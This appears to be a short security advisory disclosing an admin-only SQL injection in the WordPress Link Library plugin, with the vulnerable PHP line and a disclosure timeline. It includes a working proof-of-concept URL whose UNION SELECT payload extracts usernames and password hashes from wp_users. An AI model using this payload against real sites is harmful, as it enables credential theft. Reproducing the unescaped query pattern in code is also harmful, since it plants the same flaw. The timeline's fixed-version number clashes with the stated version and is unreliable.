Link-Library 5.9.13.26 Plugin WordPress – Sql Injection

Homepage:

https://wordpress.org/plugins/link-library/

Description:

Type user access:  is accessible only admin user.

$_GET[‘linkid’] is not escaped. Attack with Sql Injection

File / Code:

Path: /wp-content/plugin/link-library/link-library-admin.php

Line: 686

if ( isset( $_GET['genthumbsingle'] ) || isset( $_GET['genfaviconsingle'] ) ) {
   $linkquery .= " AND l.link_id = " . $_GET['linkid'];
}

$linkitems = $wpdb->get_results( $linkquery );

Proof of Concept

1 – Login with admin user:
2 – Url attack:
 http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(user_login,char(58),user_pass),17,18,19,20,21,22,23,24,25,26+FROM+wp_users+WHERE+ID=1
3 – Result:

 

Timeline:

  • 14/08/2017 – Discovered
  • 14/08/2017 – Vendor finded
  • 14/08/2017 – Correct to version 1.2.1

Leave a reply